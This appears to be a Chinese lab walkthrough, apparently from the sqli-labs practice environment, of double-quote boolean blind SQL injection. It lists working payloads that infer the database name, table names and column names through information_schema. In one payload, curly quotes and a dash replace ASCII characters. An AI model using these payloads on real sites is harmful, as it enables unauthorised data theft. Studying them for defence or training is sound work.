用语句 ?id=1" and 1=1 --+?id=1" and 1=2 --+ 判断为双引号注入
    判断1.PNG判断2.PNG

    判断数据库长度 ?id=1" and length(database())=1 --+
    数据库长度为8.PNG

    爆破数据库名字符 ?id=1" and substr(database(),1,1)='a' --+
    数据库名字.PNG

    获取数据库表的数量 ?id=1" and (select count(*) from information_schema.tables where table_schema="security") = 1 --+
    表数量为4.PNG

    判断数据库表的长度 ?id=1" and length((select table_name from information_schema.tables where table_schema='security' limit 0,1))=6--+
    表的长度.PNG

    爆破数据库表名字符 ?id=1" and substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='a' --+
    表名.PNG

    爆破表的字段数 ?id=1" and (select count(*) from information_schema.columns where table_name="users")=1 --+
    users表长度为6.PNG

    获取字段名字的长度 ?id=1” and length((select column_name from information_schema.columns where table_name=”users” limit 0,1))=1 —+
    字段数长度4.PNG

    获取字段名 ?id=1" and ascii(substr((select column_name from information_schema.columns where table_name="users" limit 0,1), 1,1))=1 --+
    字段名.PNG